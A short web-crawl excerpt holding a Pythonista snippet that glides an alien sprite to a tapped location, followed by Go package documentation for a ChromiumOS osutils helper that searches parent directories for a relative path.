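        self.player = SpriteNode('plf:AlienGreen_front',
                                 position=(self.size.w / 2, self.size.h / 2))
        self.add_child(self.player)

    def touch_began(self, touch):
        # glide the sprite to wherever the user tapped
        x, y = touch.location
        self.player.run_action(Action.move_to(x, y, 0.3))

run(TapToMove())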
https://forum.omz-software.com/user/rex_noctis
CC-MAIN-2019-47
en
refinedweb
import "go.chromium.org/chromiumos/infra/go/internal/osutils" Verify that a directory exists at the given relative path. func FindInPathParents( pathToFind string, startPath string, endPath string, testFunc func(string) bool) string Look for a relative path, ascending through parent directories. Args: pathToFind: The relative path to look for. startPath: The path to start the search from. If |startPath| is a directory, it will be included in the directories that are searched. endPath: The path to stop searching. testFunc: The function to use to verify the relative path. Verify that the given relative path exists. Package osutils imports 2 packages (graph). Updated 2019-11-12. Refresh now. Tools for package owners.
https://godoc.org/go.chromium.org/chromiumos/infra/go/internal/osutils
CC-MAIN-2019-47
en
refinedweb
As an introduction to the big bunch of code below, I think PerformanceAdviser is a misleading name that understates the power of this API feature. While the default rules do focus on performance, you can use it for a wide variety of applications, and your custom rules don’t need to have anything to do with performance.

At Revit Forum it was asked if it is possible to retrieve all current warnings from the active document. This can be done with the PerformanceAdviser, but not with the default PerformanceAdviser rules. To do this you will need to make custom rules that match the warnings that Revit creates. For this example, I made a custom rule to detect rooms that are not in properly enclosed regions.

Here are screenshots comparing the output from Revit’s standard Review Warnings dialog and the output from the macro below.

I’ve tried to be generous with the comments in this code, but please post comments with your questions. Figuring it out the first time is the hardest – creating additional rules is easier.

private void Module_Startup(object sender, EventArgs e)
{
    try
    {
        // Get the one instance of PerformanceAdviser in the Application
        PerformanceAdviser pa = PerformanceAdviser.GetPerformanceAdviser();
        // Create an instance of the RoomNotEnclosed rule class
        RoomNotEnclosed roomNotEnclosed = new RoomNotEnclosed();
        // Add this roomNotEnclosed rule to the PerformanceAdviser
        pa.AddRule( roomNotEnclosed.Id, roomNotEnclosed );
    }
    // An exception needs to be caught here because compiling the module causes Module_Startup to be invoked,
    // which calls RoomNotEnclosed() which calls CreateFailureDefinition, which is only allowed during Revit start-up.
    catch (Autodesk.Revit.Exceptions.ApplicationException) {}
}

public void RunRoomRule()
{
    Document doc = this.ActiveUIDocument.Document;
    PerformanceAdviser pa = PerformanceAdviser.GetPerformanceAdviser();
    string s = "";

    // Create a list of rules to run
    IList<PerformanceAdviserRuleId> ruleList = new List<PerformanceAdviserRuleId>();

    // Find the "Room not enclosed" rule in the set of all rules
    foreach (PerformanceAdviserRuleId ruleId in pa.GetAllRuleIds())
    {
        if (pa.GetRuleName(ruleId) == "Room not enclosed.")
        {
            // Add this rule to the list of rules to run
            ruleList.Add(ruleId);
            break;
        }
    }

    // Execute the rule and loop through every FailureMessage that results
    foreach (FailureMessage message in pa.ExecuteRules(doc, ruleList))
    {
        // for each failure get its description and the names & ids of the associated elements
        s += message.GetDescriptionText() + " Elements:" + getElementsFromList(doc, message.GetFailingElements()) + "\n\n";
    }

    if (s.Length == 0)
        s = "No warnings found";
    TaskDialog.Show("Room Warnings", s);
}

// This is the implementation of the RoomNotEnclosed rule. It is derived from the IPerformanceAdviserRule interface,
// which defines the methods that must be included.
public class RoomNotEnclosed : IPerformanceAdviserRule
{
    private FailureDefinition m_warning;
    private FailureDefinitionId m_warningId;

    // The id that uniquely identifies the rule
    public PerformanceAdviserRuleId Id = new PerformanceAdviserRuleId(new Guid("DB21C266-743E-4771-B783-CC49BE7F2A60"));

    // The name of the rule
    public string name = "Room not enclosed.";

    // This list will hold the ids of elements found by this rule
    private IList<ElementId> ids;

    // InitCheck runs once at the beginning of the check. If the rule checks the document as a whole
    // (which this rule doesn't), the check can be performed in this method.
    public void InitCheck(Document document)
    {
        // Create the list of ids if it does not already exist
        if( ids == null )
            ids = new List<ElementId>();
        // Clear the list of ids if it does already exist
        else
            ids.Clear();
    }

    // GetElementFilter gets a filter that restricts the set of elements to be checked.
    public ElementFilter GetElementFilter(Document document)
    // I want to filter for only Rooms, but it is not possible to filter on this class
    // because it is not part of Revit's native object model. Instead we must filter on
    // SpatialElement, the parent class of Room which also includes the Area and Space classes.
    {
        return new ElementClassFilter(typeof(SpatialElement));
    }

    // ExecuteElementCheck runs once for each element that passes the ElementFilter defined in GetElementFilter
    public void ExecuteElementCheck(Document document, Element element)
    {
        // Because of the inability to filter on the Room class, this cast and null check is used to restrict
        // the check to rooms only.
        Room room = element as Room;
        if (room != null && room.Area == 0)
            ids.Add(room.Id);
    }

    // FinalizeCheck runs once at the end of the check.
    public void FinalizeCheck(Document document)
    {
        if (ids.Count > 0)
        {
            // Create a new failure message
            FailureMessage fm = new FailureMessage(m_warningId);
            // Set the element ids for this failure message
            fm.SetFailingElements(ids);
            // Post a warning for this failure message
            using (Transaction t = new Transaction(document, "Failure"))
            {
                t.Start();
                PerformanceAdviser.GetPerformanceAdviser().PostWarning(fm);
                t.Commit();
            }
        }
    }

    // Return true because the rule needs to be executed on individual elements.
    // False would be used if the check applied to the document instead of individual elements.
    public bool WillCheckElements() { return true; }

    // This is a constructor that runs when the new object is created
    public RoomNotEnclosed()
    {
        m_warningId = new FailureDefinitionId(new Guid("E7BC1F65-781D-48E8-AF37-1136B62913F5"));
        m_warning = FailureDefinition.CreateFailureDefinition(m_warningId, FailureSeverity.Warning, name);
    }

    public string GetDescription()
    {
        return "This room is not enclosed. Volume, area, and perimeter will not be computed.";
    }

    public string GetName() { return name; }
}

private string getElementsFromList(Document doc, ICollection<ElementId> ids)
{
    string s = "";
    foreach (ElementId id in ids)
    {
        Element e = doc.GetElement(id);
        s += " " + e.Name + " (" + id + "),";
    }
    // A comma is added after each element id, but we don't want that comma after the last id
    return s.TrimEnd(',');
}
https://boostyourbim.wordpress.com/category/performanceadviser/
CC-MAIN-2019-47
en
refinedweb
Hi, the “Split” command for polygons generates a new object containing only the selected polygons. My little script to delete these polygons in the original object does not work anymore, since in R21 the selected object is the new one. Is there a command for selecting the object above the currently selected one in the Object Manager which could be used in Python? Normally I copy the commands out of the script log, but in this case it does not work. Cheers, Simon

"split and kill" script in R21?

Hi, the parent of an object can be easily obtained via: obj.GetUp()

If you would like to have somebody who knows a bit more about coding take a look at your script, feel free to contact me via PM.

Here’s our Split’n’Kill script:

import c4d
from c4d import utils

# Splits the current polygon selection into a new object
# and deletes it from the original object
def main():
    old = doc.GetActiveObject()
    c4d.CallCommand(14046, 14046) # Split
    new = doc.GetActiveObject()
    doc.SetActiveObject(old)
    c4d.utils.SendModelingCommand(command=c4d.MCOMMAND_DELETE,
                                  list=[old],
                                  mode=c4d.MODELINGCOMMANDMODE_POLYGONSELECTION,
                                  doc=doc)
    doc.SetActiveObject(new)

# Execute main()
if __name__=='__main__':
    main()

There’s no need to select the object above in this case, just save a reference to the currently selected (old) object into a variable before calling the split command; then you can switch between the new and old objects to do the cleanup work.
http://forums.cgsociety.org/t/split-and-kill-script-in-r21/2055213
CC-MAIN-2019-47
en
refinedweb
user=> (map (fn [x] (.toUpperCase x)) (.split "Dasher Dancer Prancer" " ")) ("DASHER" "DANCER" "PRANCER") Clojure has a rich set of data structures. They share a set of properties: They are immutable They are read-able They support proper value equality semantics in their implementation of equals They provide good hash values In addition, the collections: Are manipulated via interfaces. Support sequencing Support persistent manipulation. Support metadata Implement java.lang.Iterable Implement the non-optional (read-only) portion of java.util.Collection nil.. Computation: + - * / user=> (map (fn [x] (.toUpperCase x)) (.split "Dasher Dancer Prancer" " ")) ("DASHER" "DANCER" "PRANCER") Clojure characters are Java Characters. Keywords. Symbols are identifiers that are normally used to refer to something else. They can be used in program forms to refer to function parameters, let bindings, class names and global vars. They have names and optional namespaces, both of which are strings. Symbols can have metadata (see with-meta). Symbols, just like Keywords, implement IFn for invoke() of one argument (a map) with an optional second argument (a default value). For example ('mysym my-hash-map :none) means the same as (get my-hash-map 'mysym :none). See get... (defn hash-ordered [collection] (-> (reduce (fn [acc e] (unchecked-add-int (unchecked-multiply-int 31 acc) (hash e))) 1 collection) (mix-collection-hash (count collection)))) Unordered collections (maps, sets) must use the following algorithm for calculating hasheq. A map entry is treated as an ordered collection of key and value. Note that unchecked-add-int is used to get integer overflow calculations. (defn hash-unordered [collection] (-> (reduce unchecked-add-int 0 (map hash collection)) (mix-collection-hash (count collection)))) The mix-collection-hash algorithm is an implementation detail subject to change.. Create a new map: hash-map sorted-map sorted-map-by 'change' a map: assoc dissoc select-keys merge merge-with zipmap Examine a map: get contains? find keys vals map? Examine a map entry: key val Often many map instances have the same base set of keys, for instance when maps are used as structs or objects would be in other languages. StructMaps support this use case by efficiently sharing the key information, while also providing optional enhanced-performance accessors to those keys. StructMaps are in all ways maps, supporting the same set of functions, are interoperable with all other maps, and are persistently extensible (i.e. struct maps are not limited to their base keys). The only restriction is that you cannot dissociate a struct map from one of its base keys. A struct map will retain its base keys in order. StructMaps are created by first creating a structure basis object using create-struct or defstruct, then creating instances with struct-map or struct. StructMap setup: create-struct defstruct accessor Create individual struct: struct-map struct. Sets are collections of unique values. There is literal support for hash-sets: #{:a :b :c :d} -> #{:d :a :b :c} You can create sets with the hash-set and sorted-set functions: (hash-set :a :b :c :d) -> #{:d :a :b :c} (sorted-set :a :b :c :d) -> #{:a :b :c :d} (set [1 2 3 2 1 2 3]) -> #{1 2 3} Sets are collections: (def s #{:a :b :c :d}) (conj s :e) -> #{:d :a :b :e :c} (count s) -> 4 (seq s) -> (:d :a :b :c) (= (conj s :e) #{:a :b :c :d :e}) -> true Sets support 'removal' with disj, as well as contains? 
and get, the latter returning the object that is held in the set which compares equal to the key, if found: (disj s :d) -> #{:a :b :c} (contains? s :b) -> true (get s :a) -> :a Sets are functions of their members, using get: (s :b) -> :b (s :k) -> nil Clojure provides basic set operations like union / difference / intersection, as well as some pseudo-relational algebra support for 'relations', which are simply sets of maps - select / index / rename / join.
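To make the last paragraph concrete, here are the basic clojure.set operations in the same "expr -> result" style used above. This snippet is not from the original page, and the printed element order of unordered sets may differ on your REPL:

(require '[clojure.set :as set])

(set/union #{1 2} #{2 3})        -> #{1 2 3}
(set/intersection #{1 2} #{2 3}) -> #{2}
(set/difference #{1 2} #{2 3})   -> #{1}
(set/select odd? #{1 2 3 4})     -> #{1 3}
(set/rename #{{:a 1} {:a 2}} {:a :b}) -> #{{:b 1} {:b 2}}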
https://clojure.org/reference/data_structures
CC-MAIN-2017-39
en
refinedweb
For some reason Ruby seems to perform better when facing left recursion. For example:

def left_recursive_factorial(number)
  return 1 if number.zero?
  left_recursive_factorial(number.pred) * number
end

def right_recursive_factorial(number)
  return 1 if number.zero?
  number * right_recursive_factorial(number.pred)
end

OK, I am not a YARV hacker of any sort, but here's the difference as I understand it. When you call a method, the sender pushes the method's arguments onto the stack, then the called method pops its arguments off and pushes its return value on. With the recursive call first, the number argument hasn't been pushed onto the stack yet, so the stack of each call takes slightly less space. This is why you can get a few more iterations out of that version, but not drastically more — you're looking at a few percent reduction in stack usage.
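A quick way to see the effect yourself is the sketch below. It is not from the original answer, and the exact n at which each version overflows depends on your Ruby version and thread stack size:

# Assumes the two factorial methods above are already defined.
def survives?(method_name, n)
  send(method_name, n)
  true
rescue SystemStackError
  false
end

n = 10_000
puts "left  survives n=#{n}: #{survives?(:left_recursive_factorial, n)}"
puts "right survives n=#{n}: #{survives?(:right_recursive_factorial, n)}"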
https://codedump.io/share/HBtlYVCpGDqq/1/ruby-left-vs-right-recursion
CC-MAIN-2017-39
en
refinedweb
I am getting an error I do not understand; mind you, I'm new to coding so this may be a simple error.

#include <iostream>
using namespace std;

int main()
{
    //Initialise Fahrenheit
    float Fahrenheit = 95.0f;
    //Initialise Celcius
    double Celcius = float (Fahrenheit - 32)*0.5556;

    cout << float Fahrenheit << "F is equal to" << double Celcius << "C" << endl;

    cin.get();
    return 0;
}

The problem is this line:

cout << float Fahrenheit << "F is equal to" << double Celcius << "C" << endl;

You want to write

cout << Fahrenheit << " F is equal to " << Celcius << " C" << endl;

You can't add type names when using variables. Once you define a variable you just use it by its name. By the way, casting float to float is superfluous. And I fail to see the need to mix doubles and floats. Just use double over float unless you have benchmarks to prove you need the smaller type.
CC-MAIN-2017-39
en
refinedweb
Support for ComputeShader? I did not find any information on this topic, which leads me to believe it is not currently supported. Which would be a shame, since every modern renderer uses it in one way or another; for me it would be important for light culling for tiled/clustered rendering.

It would be nice to have a .NET Core NuGet package, and the possibility to install MonoGame using only NuGet, not the installer. Currently, as far as I know, you can't build content without the installed version.

You can build the pipeline tool from source if you want.

What has blocked us there in the past is getting a solution we could use cross-platform. There just isn't a general purpose solution that works on all our target platforms including consoles. Our solution so far has been to encourage people to use 3rd party compute solutions and let them deal with the complexities of supporting their target platforms. For example, if DirectX is all you care about you can use the features already in SharpDX to support compute. Really, until we fully resolve our shader issues with OpenGL I don't see myself thinking about the compute side of things.

Support for Microsoft® HoloLens®:
- Microsoft® HoloLens® Project Template for Visual Studio®
- Extensions to the MonoGame API (only a few required)
Thanks.

The MonoGame UWP Template works with HoloLens already. I tried it.

All UWP apps work with HoloLens® as a 2D projection. However, if you managed to get it running as a full screen holographic app, then let me know how you managed to do that with MonoGame. Thanks

UI would be nice. The only options right now are outdated XNA frameworks, EmptyKeys which is crazy complex (for me anyway), or rolling out your own. A built-in UI framework would be so nice, especially for us new to game development.

That probably won't happen, at least not in the near future. Squid caught my eye a while ago. It's a C# GUI backend; it might be a good place to start for a simpler alternative to EmptyKeys.

I think it would be cool if we could have a buffer for SpriteBatch just like we do with vertex buffers. So something like:

SpriteBatchBuffer sbb = new SpriteBatchBuffer(GraphicsDevice);

public void CreateWorld()
{
    //or could be sbb.Add()
    sbb.Draw(mytexture, new Vector2(10,10), Color.White);
}

public void Draw()
{
    SpriteBatch.Begin();
    SpriteBatch.Draw(sbb, Vector2.Zero, Color.White);
    SpriteBatch.End();
}

If the buffer saved everything on the GPU, we could get a performance increase when using 2D. It would make it very simple for people who just want to use SpriteBatch.

1: While not present on the official MonoGame site, I use all the old XNA articles for MonoGame; there are plenty of those floating around, so it takes very little time to find documentation. for example.
2: It's not integrated, but it is what I use and it's amazing. The author is quite dedicated to it as well.

MonoGame currently uses SharpDX 2.6.3. As of today the latest stable version of SharpDX is 3.0.2, which should have many bugs fixed (and yes, some new ones too I believe). Updating to SharpDX 3 any time soon would be a great benefit as it would support DX12 and all the improvements that come with it in terms of speed, threading, resources, etc., and this would attract more developers (hopefully) to the community.

Concerning the cons: it may have some parts used by MG that have changed, as for example happens with the new Mathematics library, which makes the core dll lightweight. As always, a lot to do, and no time machine available for all this, as MG must support OpenGL, Android, etc. platforms.

Support for importing the FBX 2009 format. This was present in XNA but has been left out of MonoGame. I am migrating a big project and we cannot change our model and animation pipeline. The system is too brittle and it would take too long for us to get animations working again. So for now we have to keep our old XNA-based content pipeline in a side project, just for the models.

This could be an Assimp feature, not MonoGame, which just uses it; better to ask the Assimp dev team for it.

I think Autodesk has a tool to convert them to a newer format.

Thanks. I looked it up and they do have a free converter tool, which I installed and tested. I will look more into it later.

I've just tested it yesterday, and for some reason it changes the path to textures used by the model, adding a ..\ before it... So I had to convert to ASCII to be able to edit this.

Don't know if it was already suggested: access to the low-level graphics API, i.e. SharpDX on the Windows DX platform, and the other APIs used for the other platforms (OpenTK for GL I think, etc.), in order to have access to features "denied" by the multi-platform choices made, just for those who don't care about some platforms by choice. It could be done by exposing a reference to (with the example above) the SharpDX device from the GraphicsDevice instance (according to MG's DirectX GraphicsDevice, the device, context and others are all internal, so I guess they can't be used from a game instance).

This is already available for DirectX platforms via the GraphicsDevice.Handle property.
CC-MAIN-2017-39
en
refinedweb
pthread_attr_getscope - Obtains the contention scope attribute of the specified thread attributes object.

DECthreads POSIX 1003.1c Library (libpthread.so)

#include <pthread.h>

int pthread_attr_getscope(
    const pthread_attr_t *attr,
    int *scope);

Interfaces documented on this reference page conform to industry standards as follows: IEEE Std 1003.1c-1995, POSIX System Application Program Interface

attr: Address of the thread attributes object whose contention scope attribute is obtained.
scope: Receives the value of the contention scope attribute of the thread attributes object specified by attr.

This routine obtains the value of the contention scope attribute of the thread attributes object specified in the attr argument and stores it in the location specified by the scope argument. The specified attributes object must already be initialized at the time this routine is called.

The contention scope attribute specifies the set of threads with which a thread must compete for processing resources. The contention scope attribute specifies whether the new thread competes for processing resources only with other threads in its own process, called process contention scope, or with all threads on the system, called system contention scope. DECthreads selects at most one thread to execute on each processor at any point in time.

The value of the contention scope attribute of a particular thread attributes object does not necessarily correspond to the actual scheduling contention scope of any existing thread in your multithreaded program.

If an error condition occurs, this routine returns an integer value indicating the type of error. Possible return values are as follows: Successful completion. This routine is not supported by the implementation.

None

Functions: pthread_attr_init(3), pthread_attr_setscope(3)

Manuals: Guide to DECthreads and Programmer's Guide
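A small, self-contained usage sketch (not part of the reference page): query the contention scope that a default-initialized attributes object would give to a new thread.

#include <pthread.h>
#include <stdio.h>

int main(void)
{
    pthread_attr_t attr;
    int scope;

    pthread_attr_init(&attr);   /* the attributes object must be initialized first */
    if (pthread_attr_getscope(&attr, &scope) == 0) {
        if (scope == PTHREAD_SCOPE_SYSTEM)
            printf("default contention scope: system\n");
        else if (scope == PTHREAD_SCOPE_PROCESS)
            printf("default contention scope: process\n");
    }
    pthread_attr_destroy(&attr);
    return 0;
}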
https://backdrift.org/man/tru64/man3/pthread_attr_getscope.3.html
CC-MAIN-2017-39
en
refinedweb
When you design classes, you do so without a crystal ball. Classes are designed based on the available knowledge of who the consumers of the class likely could be, and the data types those developers would like to use with your class. While developing a system, you may have a need to develop a class that stores a number of items of the integer type. To meet the requirement, you write a class named Stack that provides the capability to store and access a series of integers: using System; public class Stack { int[] items; public void Push (int item) {...}; public int Pop() {...}; } Suppose that at some point in the future, there is a request for this same functionality, only the business case requires the support for the double type. This current class will not support that functionality, and some changes or additions need to be made. One option would be to make another class, one that provided support for the double type: public class DoubleStack { double[] items; public void Push (double item) {...}; public int Pop() {...}; } But doing that is not ideal. It leaves you with two classes, and the need to create others if requests to support different types arise in the future. The best case would be to have a single class that was much more flexible. In the .NET 1.x world, if you wanted to provide this flexibility, you did so using the object type: using System; public class Stack { object[] items; public void Push (object item) {...}; public int Pop() {...}; } This approach provides flexibility, but that flexibility comes at a cost. To pop an item off the stack, you needed to use typecasting, which resulted in a performance penalty: double d = (double)stack.Pop; In addition, that class allowed the capability to write and compile the code that added items of multiple types, not just those of the double type. Fortunately, with version 2.0 of the .NET Framework, Generics provide us a more palatable solution. So what are Generics? Generics are code templates that allow developers to create type-safe code without referring to specific data types. The following code shows a new generic, GenericStack<M>. Note that we use a placeholder of M in lieu of a specific type: public class GenericStack<M> { M[] items; void Push(M input) { } public M Pop() {} } The following code shows the use of GenericStack<M>. Here, two instances of the class are created, stack1 and stack2. stack1 can contain integers, whereas stack2 can contain doubles. Note that in place of M, the specific type is provided when defining the variables: class TestGenericStack { static void Main() { // Declare a stack of type int GenericStack<int> stack1 = new GenericStack<int>(); // Declare a list of type double GenericStack<double> stack2 = new GenericStack<double>(); } } This provides support for us to use the functionality for the types we know we must support today, plus the capability to support types we'll be interested in in the future. If in the future, you create a class named NewClass, you could use that with a Generic with the following code: // Declare a list of the new type GenericStack<NewClass> list3 = new GenericStack<NewClass>(); In GenericStack<M> class, M is what is called a generic-type parameter. The type specified when instantiating the GenericStack<M> in code is referred to as a type argument. In the code for the TestGenericStack class, int and double, are both examples of type arguments. In the preceding example, there was only one generic-type parameter, M. 
This was by choice and not because of a limitation in the .NET Framework. The use of multiple generic-type parameters is valid and supported, as can be seen in this example: class Stock<X, Y> { X identifier; Y numberOfShares; ... } Here are two examples of how this could then be used in code. In the first instance, the identifier is an int, and the number of shares a double. In the second case, the identifier is a string, and the number of shares is an int: Stock<int,double> x = new Stock<int,double>(); Stock<string,int> y = new Stock<string,int>(); In these examples, we've also used a single letter to represent our generic-type parameter. Again, this is by choice and not by requirement. In the Stock class example, X and Y could have also been IDENTIFIER and NUMBEROFSHARES. Now that you've learned the basics of generics, you may have a few questions: What if I don't want to allow just any type to be passed in, and want to make sure that only types deriving from a certain interface are used? What if I need to ensure that the type argument provided refers to a type with a public constructor? Can I use generic types in method definitions? The good news is that the answer to each of those questions is yes. There will undoubtedly be instances in which you will want to restrict the type arguments that a developer may use with the class. If, in the case of the Stock<X, Y> generic, you wanted to ensure that the type parameter provided for X was derived from IStockIdentifier, you could specify this, as shown here: public class Stock<X, Y> where X:IStockIdentifier Although this example uses a single constraint that X must derive from IStockIdentifier, additional constraints can be specified for X, as well as Y. In regard to other constraints for X, you may want to ensure that the type provided has a public default constructor. In that way if your class has a variable of type X that creates a new instance of it in code, it will be supported. By defining the class as public class Stock<X, Y> where X:new() you ensure that you can create a new instance of X within the class: X identifier = new X(); As mentioned earlier, you can specify multiple constraints. The following is an example of how to specify that the Stock class is to implement both of the constraints listed previously: public class Stock<X, Y> where X:IStockIdentifier, new() In the GenericStack<M> example, you saw that there were Push and Pop methods: Push and Pop are examples of generic methods. In that code, the generic methods are inside of generic types. It is important to note that they can also be used outside of generic types, as seen here: public class Widget { public void WidgetAction<M>(M m) {...} } Note It should be noted that attempts to cast a type parameter to the type of a specific class will not compile. This is in keeping with the purpose of genericscasting to a specific type of class would imply that the generic-type paremeter is, in fact, not generic. You may cast a type parameter, but only to an interface. Inheritance is the last area we'll cover on Generics in this chapter. Inheritance is handled in a very straightforward mannerwhen defining a new class that inherits from a generic, you must specify the type argument(s). If we were to create a class that inherited from our Stock class, it would resemble the following code: public class Stock<X,Y> {...} public class MyStock : Stock<string
http://codeidol.com/community/dotnet/generics/10169/
CC-MAIN-2017-39
en
refinedweb
I'm not sure what's happening in my code. But I'm trying the excercice in notepad++ and load it into python terminal. [code is not complete, I'm just not sure why I get this output] When I import the code it prints all the "print" after the for loop like it is in the for loop for. I assume it's because it has text[c] in one print (I have no clue why it would print the other one) and c is defined in the for-loop, but when I add it to the loop I get an "unexpected indent" Error. When I remove the last "print"-line [print "not in for loop??"] and reload the file back into python the for loop only runs once. Because this makes no sense for me. def reverse(text): new = () for x in range(1,len(text)+1): c = len(text) - x print c print "\t", text[c] print "not in for loop??" return reverse("abcd") output: 3 d not in for loop?? 2 c not in for loop?? 1 b not in for loop?? 0 a not in for loop?? Very important that your indents are 4 spaces per level of indentation. Please edit your post and format the code sample so we see the correct indentation. How to format code samples in forum posts Fix your post and ping this thread so we can return for a better look. Thank you. ok thanks. finally found the problem, I think I was using the wrong characters to have the proper formatting. I also retried the code again and now my output seems to be correct (as in it's not adding the print functions in the for-loop.) Not sure how that happened since it should be the same function I tried when I posted this. Guess I made a mistake somewhere in the code, just not sure what It could have been.
https://discuss.codecademy.com/t/7-reverse-for-loop-problem/18346/2
CC-MAIN-2017-39
en
refinedweb
It seems it is currently in progress: (sorry for the spam) I won't be doing any responses to BGFX related stuff anymore after this. Then you can count the BGFX C# wrapper as another layer, so you would still have more layers on the BGFX side, which would still make it slower. My criticism was that BGFX is fairly unknown and that not many people know it, so there wouldn't be many contributors, so your solution is "Thats OK"... My criticism was that BGFX doesn't support game consoles, not who supports more platforms. Vulkan also has C# bindings... it doesn't make doing the port a whole lot easier. Take it easy. The C# wrapper is as simple as BGFX's interface: a couple of P/Invoke functions. Don't tell me it will be slower, I don't believe it. BGFX is a thin, close to the metal kind of library. BGFX has 2334 stars. Monogame has 3810. Considering Monogame is targeting a much broader audience than BGFX, that's a lot of stars. BGFX has few open issues while Monogame has more than 700... Technically it's very high quality, higher than Monogame in my judgement (no offense). BGFX has built its reputation by itself, while Monogame is where it is because of the XNA legacy. BGFX implements every graphics API, which means it implements the ones used in game consoles as well. Why not just try to compile it and see? Why don't you guys just look at it? I did look at it closely, I have evaluated it, and my judgement is that it's just the best graphics lib out there. Let me tell you my feeling right now: the problem you guys seem to have is not technical, but political. You had a closed-minded attitude right from the beginning, and I feel like I'm fighting against the status quo rather than technical constraints. I think there is already a lot of work to do on Monogame in its current stage to improve it, and little time for the developers. So all in all, introducing a new API is not just "put this dll instead" and all goes error free. There will certainly be problems not foreseen, and still not much time for contributors to develop and correct them. It is not eliminated. Rather, it is not in the pipes for now. Or someone can fork Monogame and try bgfx. Is this a hidden DX12 reference? Thank you @Alkher for your post. I know I have overreacted, but there are some attitudes I just can't stand. I would agree making MG more mature & stable is definitely the priority. Cheers. Two small things that would make Monogame move forward a lot faster: A red colored 'Bug' label should be created in the bug tracker, and assigned to every issue corresponding to a bug. I'm surprised there isn't one, and this should overall help the community to have a transparent list of bugs. I feel like most bugs are being reported by users themselves. What would be needed is a set of official technical samples that would be used as a reference, which would cover as many use cases as possible, and collect various metrics, by hardware etc... We can always create a dedicated website with such a feature... if it helped... I'd love to have a portable way to use strings without garbage collection. In the XNA times there was this: however it doesn't work on UWP, and probably won't in .NET Core. No idea about Android/iOS. I know this probably does not belong to MonoGame, but strings are crucial to most games, and probably the #1 source of garbage collection and performance degradation (or maybe it's just my games). Maybe into MonoGame.Extended? I love MonoGame and use it to teach students game development skills.
The one major issue that I have from a teacher/school perspective is that the installation only applies to the person logged in at the time of install (myself/admin). I would like the option to install MonoGame on a classroom computer and have students log into the computer with student (non-admin) accounts. Thanks,Scott The difficulty here is that Visual Studio templates are per-user as they live in the user's Documents directory. When Visual Studio is launched for the first time by a user, it creates the required directory structure in the user's Documents directory, including an empty ProjectTemplates directory. That is where custom templates should be installed. There are global templates in the Visual Studio installation directory in %ProgramFiles(x86)%\Microsoft Visual Studio \Common7\IDE\ProjectTemplates, so I might see if we can install MonoGame project templates in there. That would also neatly solve the issue of finding the user's Documents directory when the installer is running as administrator. (1) A test suite that does full API coverage to serve multiple purposes, regression testing, API validation, performance testing, and also serves as the ultimate code sample(2) Working MSAA(3) Tooling that leverages Monogame built with Monogame to enhance game development tooling for things like rigging, animation setup, etc.(4) More integration with the Visual Studio IDE to further enhance productivity(5) Gradual evolution of support libs under a different namespace with no changes to the core (either in namespaces or API because that's what makes Monogame a success). As for practical API tweaks to the core API, some of this can be done with overloads, some with extension methods, etc. And this next bit should be up to the community: I've noticed a few educators posting here. Why not assign your students projects that cover the basics of 3D that serve as useful gaming utilities. In the good old days of OpenGL there were samples for things like graphic primitive, texture operations, ... camera view plugins so you could visualize camera params within your running application etc., would be nice to have a monogame variant of this sort of thing. Having a bunch of these utility modules would go a long way to helping with workflow and should be a separate community initiative. My simple and small wish would be:- To have DrawLine, DrawRectangle, DrawCircle, DrawPolygon, DrawEtcpp in SpriteBatch itself- To be able to declare Fonts per Image/ Fonts per Font object instead of a file- The Standart Projects should have the Ability to use Visual Studios Image/3D Editor(i know that VS does have this feature its just plainly impossible to use, but why is beyond my understanding) That would be a wonderful feature. For the draw-routines... That's exactly why there is MonoGame.Extended.Just saying. In case the poster didn't know. Some people don't want to use a framework that works on top of MonoGame (MonoGame.Extended is named that way because it uses MonoGame, it does not actually have to do anything with MonoGame, it's like Nez), Yup. That's right cra0zy. Thanks for pointing that out.I meant to post that info in case the poster didn't know about MG.Ex; If he want's that functionality specifically in MG that's a valid request of course. I think that's an excellent idea, or maybe in some other class included in MonoGame if SpriteBatch doesn't make sense. 
Saw the Ex Library already, just didn't know this functionality was in it; I installed it because I needed BitmapFonts and saw that it had new overloads for the SpriteBatch. Love to have this feature
http://community.monogame.net/t/monogame-feature-wishlist/6850?page=6
CC-MAIN-2017-39
en
refinedweb
[ ] Vassilis Virvilis commented on CXF-3526: ---------------------------------------- Looks like that I missed the documentation. Do you think that it would be possible to give a warning when that happens during deploy so the user can tell when something goes wrong from the logs and not wait the runtime to see the problem. Thanks > Aegis cannot handle nested map inheritance > ------------------------------------------ > > Key: CXF-3526 > URL: > Project: CXF > Issue Type: Bug > Components: Aegis Databinding > Affects Versions: 2.3.3 > Environment: Debian GNU/Linux tomcat 6 > Reporter: Vassilis Virvilis > Assignee: Freeman Fang > Fix For: 2.4.1, 2.3.5 > > Attachments: ws-test.tgz > > > The following code fails when trying to retrieve data with the simple fronted > public class ComplexMapResult extends > HashMap<String, Map<Integer, Integer>> { > } > // fail returns null map value > public ComplexMapResult testComplexMapResult(); > How it fails. On retrieve when I try to print the resulting matrix I get > INFO: client.TestClient.testComplexMapResult(TestClient.java:35): {key1=[#document: null]} > where I should get a valid map for the key "key1" > The following code succeeds > // success > public Map<String, Map<Integer, Integer>> testDirectComplexMapResult(); > So my guess is Aegis doesn't handle the inheritance very well. > Further more the following code succeeds > // success > public class SimpleMapResult extends HashMap<String, Integer> { > } > // success > public SimpleMapResult testSimpleMapResult(); > so that means it handles the extension when there is no nesting > I will try to attach the eclipse project for this (~7k) -- This message is automatically generated by JIRA. For more information on JIRA, see:
http://mail-archives.apache.org/mod_mbox/cxf-issues/201105.mbox/%3C149541039.42310.1306331687404.JavaMail.tomcat@hel.zones.apache.org%3E
CC-MAIN-2017-39
en
refinedweb
- Issued: 2010-11-16
- Updated: 2010-11-16
RHSA-2010:0891 - Security Advisory
Synopsis
Moderate: pam security update
Type/Severity
Security Advisory: Moderate
Topic
Description
37898 - CVE-2010-3316 pam: pam_xauth missing return value checks from setuid() and similar calls
- BZ - 641335 - CVE-2010-3435 pam: pam_env and pam_mail accessing users' file with root privileges
- BZ - 643043 - CVE-2010-3853 pam: pam_namespace executes namespace.init with service's environment.
https://access.redhat.com/errata/RHSA-2010:0891
CC-MAIN-2017-39
en
refinedweb
lp:libpsml
Main development branch, incorporating the latest usability and format changes.
- Get this branch:
- bzr branch lp:libpsml
Branch merges
Related bugs
Related blueprints
Branch information
- Owner: Alberto Garcia
- Status: Development
Recent revisions
- 109. By Alberto Garcia on 2017-07-27
Export of ps_real_kind. Simple test. Update psml files and docs
* Update the documentation of the annotation routines
* Add export of ps_real_kind, and document it.
* Update the psml files in examples/
* Add a very simple installation test and reference data
* Update the release_notes
This is a patch release tagged as libpsml-1.1.5
